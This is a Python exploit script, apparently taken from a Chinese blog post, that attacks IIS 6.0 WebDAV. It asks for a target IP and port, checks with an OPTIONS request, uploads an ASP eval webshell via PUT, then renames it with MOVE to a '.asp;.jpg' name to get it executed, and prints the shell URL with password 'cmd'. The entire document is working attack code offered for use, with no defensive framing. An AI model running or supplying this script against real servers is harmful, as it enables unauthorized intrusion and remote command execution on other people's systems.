import requests
import time
author_info='''
__________________ _______ ______ _______ _______ _______
\__ __/\__ __/( ____ \ / ____ \ ( __ ) ( ____ \|\ /|( ____ )
) ( ) ( | ( \/( ( \/ | ( ) | | ( \/( \ / )| ( )|
| | | | | (_____ | (____ | | / | | (__ \ (_) / | (____)|
| | | | (_____ )| ___ \ | (/ /) | | __) ) _ ( | _____)
| | | | ) || ( ) ) | / | | | ( / ( ) \ | (
___) (______) (___/\____) |( (___) )_ | (__) | | (____/\( / \ )| )
\_______/\_______/\_______) \_____/(_)(_______) (_______/|/ \||/
By_Fright_Moch v1.0
'''
print(author_info)
print("请输入ip地址去掉http,例如:127.0.0.1")
ip=input("ip地址:")
print("请输入端口,例如:8080")
port=input("端口:")
filename = str(int(time.time()))
# 检测漏洞是否存在
url = f"http://{ip}:{port}/111"
headers = {
"Host": f"{ip}:{port}",
"Content-Length": "0",
"Connection": "close",
"Max-Forwards": "10",
"TE": "trailers"
}
response = requests.options(url, headers=headers, verify=False)
if response.status_code == 200:
print("漏洞存在!")
else:
print("漏洞不存在!")
exit()
# 上传shell
url = f"http://{ip}:{port}/{filename}.txt"
headers = {
"Host": f"{ip}:{port}",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "25"
}
data = '''<% eval request("cmd") %>'''
response = requests.put(url, headers=headers, data=data, verify=False)
if response.status_code == 201:
print("上传成功!")
else:
print("上传失败!")
exit()
# 移动shell
url = f"http://{ip}:{port}/{filename}.txt"
headers = {
"Host": f"{ip}:{port}",
"Destination": f"/{filename}.asp;.jpg",
"Content-Length": "0",
"Connection": "close"
}
data = '''<% eval request("cmd") %>'''
response = requests.request("MOVE", url, headers=headers, verify=False,data=data)
if response.status_code == 201:
print(f"shell地址:http://{ip}:{port}/{filename}.asp;.jpg密码为cmd")
else:
print("移动失败!")
exit()
效果如下